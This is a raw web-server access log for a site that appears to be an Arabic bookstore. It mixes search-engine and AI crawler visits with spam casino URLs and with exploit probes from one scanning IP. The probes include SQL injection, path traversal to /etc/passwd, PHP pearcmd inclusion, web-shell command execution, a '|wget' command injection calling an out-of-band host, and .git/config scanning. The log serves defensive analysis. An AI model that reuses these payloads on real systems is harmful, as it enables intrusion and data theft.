45.192.99.121 - - [12/Jun/2025:19:56:37 +0200] "POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1" 403 199 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:129.0) Gecko/20100101 Firefox/129.0"
45.192.99.121 - - [12/Jun/2025:19:56:40 +0200] "GET /seeyon/test123456.jsp?pwd=asasd3344&2yMtJsCTASX2ngLmlByyORJQbcx=ipconfig HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
45.192.99.121 - - [12/Jun/2025:19:56:40 +0200] "GET /images/logo/logo-eoffice.php HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15"
45.192.99.121 - - [12/Jun/2025:19:56:40 +0200] "POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36"
45.192.99.121 - - [12/Jun/2025:19:56:40 +0200] "POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4.1 Safari/605.1.15"
4.227.36.96 - - [12/Jun/2025:20:20:36 +0200] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.85 - - [12/Jun/2025:20:20:38 +0200] "GET /?innovations-et-machines-a-sous-a-sokode-une-revolution-dans-lunivers-du-jeu HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.75.224 - - [12/Jun/2025:20:23:12 +0200] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.224 - - [12/Jun/2025:20:23:13 +0200] "GET /publishWithUs HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
185.132.133.195 - - [12/Jun/2025:20:53:34 +0200] "GET /products/%D9%85%D9%86-%D9%87%D9%86%D8%A7-%D8%A5%D9%84%D9%89-%D8%A7%D9%84%D9%82%D9%84%D8%A8/176?slot HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36"
185.132.133.198 - - [12/Jun/2025:20:53:36 +0200] "GET /?slot HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36"
185.132.133.198 - - [12/Jun/2025:21:33:25 +0200] "GET /?slot HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36"
66.249.76.161 - - [12/Jun/2025:21:36:12 +0200] "GET /?rhlt-aly-alm-albwkr-almmt-fy-bwrsyd HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.161 - - [12/Jun/2025:21:55:52 +0200] "GET /?mwanza-poker-dynamics-an-insiders-perspective HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.163 - - [12/Jun/2025:22:36:57 +0200] "GET /authors/40 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.225 - - [12/Jun/2025:22:40:42 +0200] "GET /?maximizing-casino-experiences-in-zanzibar-tips-and-tricks HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.161 - - [12/Jun/2025:22:48:12 +0200] "GET /?afdl-tqnyat-allb-fy-albwkr-almsry-dlyl-shaml-lfn-alfwz HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.13.127 - - [12/Jun/2025:22:53:01 +0200] "GET /search?keyword=2025 HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.73.216.14 - - [12/Jun/2025:23:15:05 +0200] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.14 - - [12/Jun/2025:23:15:05 +0200] "GET /sitemap.xml HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
85.208.98.23 - - [12/Jun/2025:23:17:33 +0200] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
85.208.98.22 - - [12/Jun/2025:23:18:00 +0200] "GET /products/%D8%A7%D8%A8%D8%AC%D8%AF%D9%8A%D8%A7%D8%AA-%D8%A7%D9%84%D8%AA%D8%B9%D9%84%D9%8A%D9%85-%D8%A7%D9%84%D9%81%D8%B9%D8%A7%D9%84/52 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (compatible; SemrushBot-BA; +http://www.semrush.com/bot.html)"
45.192.99.121 - - [12/Jun/2025:23:44:19 +0200] "POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0"
45.192.99.121 - - [12/Jun/2025:23:44:20 +0200] "GET /public/index.php/home/file/user_pics HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
45.192.99.121 - - [12/Jun/2025:23:59:15 +0200] "GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager HTTP/1.1" 403 199 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
45.192.99.121 - - [12/Jun/2025:23:59:15 +0200] "GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
45.192.99.121 - - [12/Jun/2025:23:59:15 +0200] "GET / HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
45.192.99.121 - - [12/Jun/2025:23:59:15 +0200] "GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27-- HTTP/1.1" 403 199 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0"
45.192.99.121 - - [12/Jun/2025:23:59:15 +0200] "GET /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15"
45.192.99.121 - - [12/Jun/2025:23:59:15 +0200] "GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0"
45.192.99.121 - - [12/Jun/2025:23:59:15 +0200] "GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:132.0) Gecko/20100101 Firefox/132.0"
45.192.99.121 - - [12/Jun/2025:23:59:15 +0200] "POST /guest_auth/guestIsUp.php HTTP/1.1" 403 199 "-" "-"
45.192.99.121 - - [12/Jun/2025:23:59:15 +0200] "POST /dataSetParam/verification;swagger-ui/ HTTP/1.1" 301 283 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
45.192.99.121 - - [12/Jun/2025:23:59:15 +0200] "POST /uapjs/jsinvoke/?action=invoke HTTP/1.1" 301 275 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15"
45.192.99.121 - - [12/Jun/2025:23:59:15 +0200] "POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
45.192.99.121 - - [12/Jun/2025:23:59:15 +0200] "POST /bsh.servlet.BshServlet HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; sv-SE) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4"
45.192.99.121 - - [12/Jun/2025:23:59:15 +0200] "POST /zentao/user-login.html HTTP/1.1" 403 199 "https://www.php.adabbook.com.eg/zentao/user-login.html" "Mozilla/5.0 (Fedora; Linux i686; rv:131.0) Gecko/20100101 Firefox/131.0"
45.192.99.121 - - [12/Jun/2025:23:59:15 +0200] "POST /mobile/plugin/browser.jsp HTTP/1.1" 500 542 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0"
45.192.99.121 - - [12/Jun/2025:23:59:15 +0200] "POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15"
45.192.99.121 - - [12/Jun/2025:23:59:15 +0200] "mac=1&ip=127.0.0.1|wget d14q54aevdlhf743m9cg9coa3zfc7isnu.oast.fun" 400 173 "-" "-"
45.192.99.121 - - [12/Jun/2025:23:59:15 +0200] "POST /index.php/User/doLogin HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/104.0 Safari/537.36"
66.249.75.224 - - [13/Jun/2025:00:03:51 +0200] "GET /authors/63 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
23.178.112.212 - - [13/Jun/2025:00:12:39 +0200] "GET /.well-known/acme-challenge/FTj2r572MELU92C74L7lhBPpN3lhMtR21xdCvAQT5BI HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
66.249.76.161 - - [13/Jun/2025:00:13:54 +0200] "GET /products/%D8%B5%D8%AE%D8%A8-%D8%A7%D9%84%D8%AE%D8%B3%D9%8A%D9%81-3/184 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.236 - - [13/Jun/2025:00:36:17 +0200] "GET /products/%D8%B5%D8%A7%D8%A6%D8%AF-%D8%A7%D9%84%D8%B3%D8%A7%D8%AD%D8%B1%D8%A7%D8%AA/216 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
23.178.112.103 - - [13/Jun/2025:01:08:00 +0200] "GET /.well-known/acme-challenge/AicBhJuXaaDQwdIglXcrwCYXz5lfvyaJbSBrAfuSFhY HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
23.178.112.213 - - [13/Jun/2025:01:08:03 +0200] "GET /.well-known/acme-challenge/k190xobfI_V7028kK7ultegUJclC1BKWokl8U6w9ArY HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
23.178.112.210 - - [13/Jun/2025:01:08:07 +0200] "GET /.well-known/acme-challenge/LunmIWfFfXutkRmF-ju1W5iEwKyepeG0L5-gu4JNLRo HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
23.178.112.105 - - [13/Jun/2025:01:08:10 +0200] "GET /.well-known/acme-challenge/a7jf9djyBkcdEo4pc0-yDjI4ACAyoQlLo_lD982Cwcs HTTP/1.1" 404 169 "-" "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)"
207.46.13.155 - - [13/Jun/2025:01:13:44 +0200] "GET /search?keyword=2025 HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.75.224 - - [13/Jun/2025:01:20:30 +0200] "GET /?kyfyt-alastmta-btjrbt-alkazynw-wnsayh-allb-fy-alaskndryt HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.236 - - [13/Jun/2025:01:50:30 +0200] "GET /products/%D8%A7%D9%84%D9%85%D8%B1%D9%8A%D8%A7%D8%B9-%D8%A7%D8%B1%D9%81%D8%B9-%D8%A7%D9%84%D8%B4%D8%A7%D8%B4%D8%A9/84 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.163 - - [13/Jun/2025:01:52:00 +0200] "GET /page/%D8%B3%D9%8A%D8%A7%D8%B3%D8%A9-%D8%A7%D9%84%D8%B4%D8%AD%D9%86-%D9%88%D8%A7%D9%84%D8%AA%D9%88%D8%B5%D9%8A%D9%84 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.162 - - [13/Jun/2025:02:19:08 +0200] "GET /last-products?page=5 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.178.110.146 - - [13/Jun/2025:02:37:17 +0200] "GET /.git/config HTTP/1.1" 403 169 "-" "w3m/0.5.1"
207.46.13.127 - - [13/Jun/2025:02:58:46 +0200] "GET /public/category/%C3%98%C2%AA%C3%98%C2%B7%C3%99%CB%86%C3%99%C5%A0%C3%98%C2%B1-%C3%98%C2%A7%C3%99%E2%80%9E%C3%98%C2%B0%C3%98%C2%A7%C3%98%C2%AA/134 HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.75.236 - - [13/Jun/2025:03:24:47 +0200] "GET /authors/86 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.161 - - [13/Jun/2025:03:38:23 +0200] "GET /category/%D8%B1%D9%88%D8%A7%D9%8A%D8%A9/119?page=7 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.224 - - [13/Jun/2025:03:53:12 +0200] "GET /?afdl-nsayh-llmrahnat-alryadyt-fy-alasmaylyt-dlyl-shaml-llnjah HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.225 - - [13/Jun/2025:04:01:19 +0200] "GET / HTTP/1.1" 500 542 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.161 - - [13/Jun/2025:04:01:20 +0200] "GET / HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.225 - - [13/Jun/2025:04:01:20 +0200] "GET / HTTP/1.1" 500 542 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.236 - - [13/Jun/2025:04:01:22 +0200] "GET / HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.161 - - [13/Jun/2025:04:01:22 +0200] "GET /favicon.ico HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0"
66.249.75.236 - - [13/Jun/2025:04:01:23 +0200] "GET /favicon.ico HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0"
66.249.75.224 - - [13/Jun/2025:04:01:25 +0200] "GET /favicon.ico HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /old/.git/config HTTP/1.1" 403 196 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /js../.git/config HTTP/1.1" 403 169 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /dev/.git/config HTTP/1.1" 403 196 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /www/.git/config HTTP/1.1" 403 169 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/128.0 (x64 de)"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /backend/.git/config HTTP/1.1" 403 169 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.6.22"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /src/.git/config HTTP/1.1" 403 196 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /staging/.git/config HTTP/1.1" 403 196 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /api/.git/config HTTP/1.1" 403 196 "-" "Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /source/.git/config HTTP/1.1" 403 169 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.79"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /files/.git/config HTTP/1.1" 403 196 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /template/.git/config HTTP/1.1" 403 196 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /lib/.git/config HTTP/1.1" 403 169 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/616.20.13 (KHTML, like Gecko) Version/17.7.74 Safari/616.20.13"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /panel/.git/config HTTP/1.1" 403 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.0 Safari/537.36"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /scripts/.git/config HTTP/1.1" 403 169 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /sandbox/.git/config HTTP/1.1" 403 169 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /docs/.git/config HTTP/1.1" 403 169 "-" "Mozilla/5.0 (Debian; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /assets/.git/config HTTP/1.1" 403 169 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /dist/.git/config HTTP/1.1" 403 169 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /laravel/.git/config HTTP/1.1" 403 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /core/.git/config HTTP/1.1" 403 196 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /plugins/.git/config HTTP/1.1" 403 196 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /public/.git/config HTTP/1.1" 403 169 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /logs/.git/config HTTP/1.1" 403 169 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /app/.git/config HTTP/1.1" 403 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /static../.git/config HTTP/1.1" 403 196 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /test/.git/config HTTP/1.1" 403 196 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /admin/.git/config HTTP/1.1" 403 169 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /wp-content/.git/config HTTP/1.1" 403 196 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /media../.git/config HTTP/1.1" 403 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
185.177.72.14 - - [13/Jun/2025:04:04:13 +0200] "GET /frontend/.git/config HTTP/1.1" 403 196 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.249.76.163 - - [13/Jun/2025:04:06:13 +0200] "GET /authors/118 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
104.210.140.130 - - [13/Jun/2025:04:18:30 +0200] "GET /robots.txt HTTP/1.1" 200 24 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
45.192.99.121 - - [13/Jun/2025:04:46:57 +0200] "GET /?lang=../../../../../usr/local/php/pearcmd HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0"
45.192.99.121 - - [13/Jun/2025:04:46:59 +0200] "GET / HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.6 Mobile/15E148 Safari/604.1"
45.192.99.121 - - [13/Jun/2025:04:47:01 +0200] "GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+B7851WWJlZ.log HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/103.0 Safari/537.36"
